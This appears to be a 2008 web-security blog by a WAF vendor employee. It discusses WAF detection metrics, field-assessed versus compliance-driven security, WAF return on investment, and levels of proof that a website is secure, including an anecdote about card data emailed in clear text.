When I say web security metrics, I am referring to data that is relevant to answering the question - Are we winning or losing the game? By that I mean - in football in order to win the game you have to have more points than your opponent at the end of the game. In webappsec, if you are in charge of defending a web application, you win if an attacker tries to compromise your site and is unable. This seems like a "Duh" statement but it actually isn't when you consider how many web security vendors try and tell you the "Score of the Game". Most vendors will present customers with colorful pie charts stating that a web site has X number of vulnerabilities or that they blocked X number of attacks. This is like asking someone who won the Giants vs. Patriots game and getting a response of - the Patriots completed 35 passes while the Giants intercepted them 3 times. Not really answering the question is it? While some customers may be distracted by eye-catching graphical displays of this information, the savvy ones will ask this key question - Were there any successful attacks? The answer to this question will tell you the score of the game - did the opponent score any touchdowns??? All other data is corollary.

Sidebar - realistically you are dealing with two different types of attacks - the automated kind where an attacker is targeting a specific vuln and searching for sites that have it or the manual type where the attacker is targeting your site specifically and they must then find a vuln to exploit. In the former case, it is like when a football opponent tries one desperate Hail-Mary pass down the field as time expires. If you bat the football down, you win. If you don't, you lose. In the latter case, it is like a methodical 99-yard drive down the field where your opponent is running 2-yard dive plays left and right and slowly marching down the field. If you give them enough time, then they will most likely score. In this case, it is critical that your webappsec defenses are such that you are able to force the attacker to manually try and search for complex logical attacks or develop evasions, you might then be able to implement countermeasures to prevent them access before being successful.

With this concept as a backdrop, let me present the web security metrics that I feel are most important for the production network and gauging how the web application's security mechanisms are performing -

  1. Web Transactions per Day - This should be represented as a number (#) and establishes a baseline of web traffic and provides some perspective for the other metrics. Some WAFs will be able to keep track of this data on their own. If this is not possible then you would need to correlate web server log data.
  2. Attacks Detected/True Positive - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of malicious web traffic. These numbers are presented in a all WAF reporting functions.
  3. Missed attacks/False Negative - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of the effectiveness of the web application firewall's detection accuracy. This is the key metric that is missing when people are trying to determine their webappsec success. If the WAF is configured for "alert-centric" logging and therefore only logging blocked attacks then you will not be able to report on this data automatically using the WAFs built-in reporting facilities. If, on the other hand, the WAF audit logging all relevant traffic (requests for non-static resources, etc...) then an Analyst would have raw data to conduct batch analysis and identify missed attacks. The fall-back data source would be whatever incident response processes exist for the organization. There may be other sources of data (web logs, IDS, etc...) where a web attack may be confirmed.
  4. Blocked Traffic/False Positive - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of the effectiveness of web application firewall's detection accuracy. This is very important data for many organizations because blocking legitimate customer traffic can mean missed revenue. This can usually be identified by evaluating any Exceptions that needed to be implemented by the WAF in order to allow "legitimate" traffic that was otherwise triggering a negative security rule or signature. Besides Exceptions, this data can be identified in Reports if the WAF has appropriate alert ticketing interfaces where an Analyst can categorize the alert.
  5. Attack Detection Failure Rate - This data should be represented as a percentage (%) and is derived by adding items 3 (False Negatives) and 4 (False Positives) and then dividing by item 2 - True Positives. This percentage will give an overall effectiveness of web application firewall's detection accuracy - meaning the Score of the Game.

Sidebar - I am referencing web application firewalls in the metrics as they are specifically designed to report on this type of data. You could substitute any security filtering code mechanism built directly into the webapp code, however many implementations do not adequately provide logging and reporting for this data. This code may present users with a friendly error message, however they are essentially performing "silent drops" of requests from the back-end logging perspective.

As stated earlier, many webappsec vendors will only provide statistics related to item #2 (blocked attacks). While this data does factor into the equation, it does not provide the best indicator of overall web application security on its own. So, if you really want to know what the score of the game is for you web applications, I suggest you start tracking the metrics provided in this post.

Tuesday, May 20, 2008

What's the Score of the Game?

We, as the webappsec community, should try and move away from "Holy Wars" debating that there is only one right way to address web application vulnerabilities - source code reviews, vulnerability scanning or web application firewalls - and instead focus on the end results. Specifically, instead of obsessing on Inputs (using application x to scan) we should turn our attention towards Outputs (web application hackability). This concept has been skillfully promoted by Richard Bejtlich of TaoSecurity and is called Control-Compliant vs. Field-Assessed security. Here is a short paragraph intro:

In brief, too many organizations, regulators, and government agencies waste precious time and resources devising and auditing "controls," regardless of the effect these controls have or do not have on security. They are far too input-centric; they should become more output-aware. They obsess over recording conditions they believe may be helpful while remaining ignorant of the "score of the game." They practice management by belief and disregard management by fact.

While the impetus for Richard's soapbox rant was the Goverment auditing mindsets, we can still apply this same "input-centric" focus to our current state of webappsec. Due to regulations such as PCI, we are unfortunately framing web security in an input-centric lens and forcing users to checkmark a box stating that they are utilizing process x rather than formulating a strategy to conduct field-assessments to obtain proper metrics on how difficult is it to hack into the site. We are focusing too much on whether a web application's code was either manually or automatically reviewed or if it was scanned with vendor X's scanner, rather than focusing on what is really important - did these activities actually prevent someone from breaking into the web application? If the answer is No, then who really cares what process you followed. More specifically, the fact that your site was PCI compliant at the time of the hack is going to be of little consequence.

Let's take a look at each of these input-centric processes through another great analogy by Richard:

Imagine a football (American-style) team that wants to measure their success during a particular season. Team management decides to measure the height and weight of each player. They time how fast the player runs the 40 yard dash. They note the college from which each player graduated. They collect many other statistics as well, then spend time debating which ones best indicate how successful the football team is. Should the center weigh over 300 pounds? Should the wide receivers have a shoe size of 11 or greater? Should players from the north-west be on the starting line-up? All of this seems perfectly rational to this team. An outsider looks at the situation and says: "Check the scoreboard! You're down 42-7 and you have a 1-6 record. You guys are losers!"

This is an analogy that I have been using more and more recently when discussing source code reviews as they are somewhat like the NFL Scouting Combine. Does measuring each players physical abilities guarantee a player or teams success? Of course not. Does it play a factor in the outcome of an actual game? Usually, however a team's Draft Grade does not always project to actual wins the following season. Similarly, is using an input validation security framework a good idea? Absolutely, however the important point is to look at the web application holistically in a "real game environment" - meaning in production - to see how it performs.

Sticking with the analogy, vulnerability scanning in dev environments is akin to running an Intra-squad scrimmage. It is much more similar to actual game conditions - there is an offense and defense, players are wearing pads and there is a time clock, etc... While this is certainly more realistic to actual game conditions, there is one key element missing - the opponent. Vulnerability scanners do not act in the exact same way that attackers do. Attackers are unpredictable. This is why, even though a team reviews film of their opponent to identify tendencies and devise a game plan to protect their own, it is absolutely critical that a team is able to make adjustments on the fly during a game. It is for this reason that running vulnerability scans in production is critical as you need to test the live system.

Running actual zero-knowledge penetration tests is like Pre-season games in the NFL. The opponent in this case is acting much more like a real attacker would and is actually exploiting vulnerabilities rather than probing and making inferences about vulnerabilities. It is as close as you can get to the real thing, except that the outcome of the game doesn't matter :)

Web application firewalls, that are running in Detection Only modes, are like trying to have a real football game but only doing two-hand touch. If you don't really try and tackle an opponent to the ground (meaning implement blocking capabilities) then you will never truly prevent an attack. Also, as most of you have seen with premiere running backs in the NFL - they have tremendous "evasion" capabilities such as spin moves and stiff-arms that make it difficult for defenders to tackle them. This is the same for web application layer attacks, WAFs need to be running in block mode and have proper anti-evasion normalization features to be able to properly prevent attacks.

It is on the live production network where all or your security preparations will pay off, or on the other hand, it is also where your web application security will crash and burn. I very seldom see development and staging areas that adequately mimic the production environment, which means that you will not truly know how your web application security will fair until it is allowed to be accessed by un-trusted clients. When your web application goes live, it is critical that your entire "team" (developers, assessemnt and operations) is focused and able to quickly respond to the unexpected behavior of clients. The problem is that these groups do not always communicate effectively and coordinate their efforts. Specifically, these three groups should be sharing their output with the other two:

Conduct code reviews on all web applications and fix the identified issues. The code reviews should be conducted when applications are initially being developed and placed into production and also when there are code changes. Any issues that can not be fixed immediately should be identified and passed onto the vulnerabilty scanning and WAF teams for monitoring and remediation.

Conduct vulnerability scans and penetration tests on all web applications. Should be conducted prior to an application going online and then at regularly scheduled intervals and on an on-demand basis when code changes are made. Any issues identified should be passed onto the Developement and WAF teams for remediation.

Deploy a Web Application Firewall in front of all web server. A WAF will provide protection in production. When the WAF identifies issues with the web application, it can provide reports back to both Development and Vulnerability Scanning teams for remediation and monitoring. It is this on-the-fly, in-game agility where a WAF shines.

Are game time adjustments always the absolute best option when they are being reviewed in film sessions the following day or on Monday by Arm-Chair Quaterbacks? Nope, but that is OK. They can be adjusted. Also, this film review will also allow for the identification of root-cause issues so that they can be fixed (source code changes) in preparation for the next game.

Friday, February 1, 2008

Tangible ROI of a Web Application Firewall (WAF)

One of the challenges facing organizations that need to increase the security of their web applications is to concretely provide appropriate "Return On Investment" (ROI) for procurement justification. Organizations can only allocate a finite amount of budget towards security efforts therefore security managers need to be able to justify any commercial services, tools and appliances they want to deploy. As most people who have worked in information security for an extended period of time know, producing tangible ROI for security efforts that address business driver needs is both quite challenging and critically important.

The challenge for security managers is to not focus on the technical intricacies of the latest complex web application vulnerability or attack. C-level Executives do not have the time, and in most instances the desire, to know the nuances of an HTTP Request Smuggling attack. That is what they are paying you for! Security managers need to function as a type of liaison where they can take data from the Subject Matter Experts (SMEs) and then translate that into a business value that is important to the C-level Executive.

One, almost guaranteed, pain point to most executives are vulnerability scan reports that are presented by auditors. The auditors are usually being brought in from and reporting to a higher-level third party (be it OMB in the Government or PCI for Retail). Executives like to see "clean vulnerability scan reports." While this will certainly not guarantee that your web application is 100% secure, it can certainly help to prove the counter-argument. And to make matters worse, nothing is more frustrating to upper Management than auditor reports list repeat vulnerabilities that either never go away or pull the "Houdini" trick (they disappear for awhile only to suddenly reappear). Sidebar - see Jeremiah Grossman's Blog post for examples of this phenomenon. These situations are usually attributed to breakdowns in the Software Development Life Cycle (SDLC) where code updates are too time consuming or the change control processes are poor.

This is one of the best examples of where a Web Application Firewall can prove its ROI.

At Breach Security, we receive many inbound calls from prospects who are interested in WAF technology but are lacking that "Big Stick" that helps convince upper management to actually make the purchase. The best scenario we have found is to suggest a Before and After; comparison of a vulnerability scan report while they are testing the WAF on their network. The idea is to deploy the WAF in block mode and then initiate a rescan of a protected site. The difference in the reduction of findings is an immediate, quantitative ROI.

Here is a real example. One of our current customers followed this exact roadmap and this is a summary (slightly edited to remove sensitive information) of the information they sent back to us:

Our WAF is installed and running. I have tested its impact on www.example.com and it is operating very admirably. This morning I had the vulnerability scanning team run an on-demand scan to test the efficacy of the appliance, and I was very impressed with the results. Our previous metrics for www.example.com in the last scan were 64 vulnerabilities, across all outside IP addresses (including www.example.com, example2.com, example3.com, etc.) and with the Breach appliance in place, the metric from today's scan was 5 vulnerabilities, with details:

- High vulnerabilities dropped from 38 to 0

- Medium vulnerabilities dropped from 12 to 0

- 1 low vulnerability remains due to simply running a web server (we will eliminate this via exception)

- 1 low vulnerability due to a file/folder naming convention that is typical and attracts unwanted attacks (will be eliminated via rule addition)

Bear in mind that I have applied the appliance with a basic (almost strictly out-of-the-box) configuration and ruleset to protect only www.example.com (192.168.1.100 in the report), and the 35 warnings that remain are for the other websites, and would similarly disappear when protected by the appliance. In my opinion, this was a very successful test that indicates the effectiveness of the appliance.

So, looking at the report after the WAF was in place, the www.example.com web site removed 38 high and 12 medium vulnerabilities and left only 2 low ones (which are really just informational notices). That is pretty darn good and that was just with the default, generic detection ModSecurity rule set! Hopefully this information has helped to provide a possible use-case testing scenario to show tangible ROI of a WAF.

In a future post, I will discuss how custom WAF rule sets can be implemented to address more complex vulnerability issues identified not by a scanner but by actual people who have performed a web assessment/pentest.

Wednesday, January 30, 2008

Is Your Website Secure? Prove It.

The recent Geeks.com compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks goes to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post form the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light onto specific areas of strength and weakness.

What does it mean to be secure?

Obviously having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed to re-assure potential customer that it is safe to purchase goods at their site. The reality is that these logos are non-reliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: Security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six word question into are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of the answer as well. For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the varios levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence for you non-imaginative folks.) This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way, would auditors accept this answer? Could you pass a PCI Audit by simply responding yeah, we are secure. Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear and that is - yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. Awhile back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring as I obviously did not want to send my credit card number to them in clear text. During my checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" in the lower-right hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:

To:companyname@aol.com
From: RCBarnett@email.com
Subject:ONLINE HERBPACK!!!
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
phone#:
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black: number of hats-gray:
number of hats-navy: number of hats-red:
number of hats-rtcamo: number of hats-orange:
do you want it shipped to a friend:
name:
their address:
their city:
their state:
their zip:

cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, are a minimum standard of due care and passing the audit does make your site "unhackable." A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real of evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's Blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future Blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations can not provide this answer. Put it this way, Common Log Format (CLF) logs are not adequate for full web based incident responst. Too much data is missing. If this is really close, why isn't it correct?

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Think of this practical exercise, if you run a zero-knowledge (meaning un-announced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.

Conclusion

Indirectly, this post also explains why only doing one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall and log analysis does not adequately ensure "security." While each of these tasks excel in some areas and aid in the overall security of a website, they are each also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."